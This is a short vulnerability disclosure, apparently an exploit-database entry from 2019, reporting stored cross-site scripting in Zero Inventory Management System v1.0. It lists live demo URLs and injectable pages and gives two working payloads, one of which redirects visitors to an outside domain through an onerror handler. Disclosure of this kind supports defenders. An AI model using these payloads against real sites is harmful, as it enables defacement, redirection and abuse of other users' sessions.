Below is a copy: Zero Inventory Management System v1.0 Stored XSS Injection
/*!
* ::- Title: Zero Inventory Management System v1.0 Stored XSS Injection
* ::- Author: m0ze
* ::- Date: 2019/06/10
* ::- Software: Zero Inventory Management System v1.0
*/
::- Details & Description -::
~ Weak security measures like no input fields data filtering has been discovered in the Zero Inventory Management System. Current version of this web-application is 1.0.
::- Demo Website -::
~ https://codecanyon.net/item/zero-inventory-management-system/23875178
~ Backend: http://zeroinfosys.com/inventory
~ Login & Password: doesn't matter, pick any credentials on the backend login page
::- Special Note -::
~ Declared options of this item with price $50 is: Highly Security provided and Injection protected.
::- PoC Links -::
~ http://zeroinfosys.com/inventory/warehouse_manager
~ http://zeroinfosys.com/inventory/admin
~ http://zeroinfosys.com/inventory/showroom_manager/Categories
~ http://zeroinfosys.com/inventory/showroom_manager/Expense
::- PoC [Stored XSS Injection] -::
~ Go to the demo website http://zeroinfosys.com/inventory and log in with provided credentials. Then go to any page you want and add a new data or edit the existed. There is no input data filtering at all, so use any payload you want.
~ You can edit the users profile also, just delete the disabled attribute for any input field or text area and then save your changes.
~ Example #1: <span onmouseover="alert('m0ze')" style="font-size:88px;color:#ff003b;">m0ze</span>
~ Example #2: <img src="x" onerror="alert('m0ze');window.location='http://defcon.su/';">
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum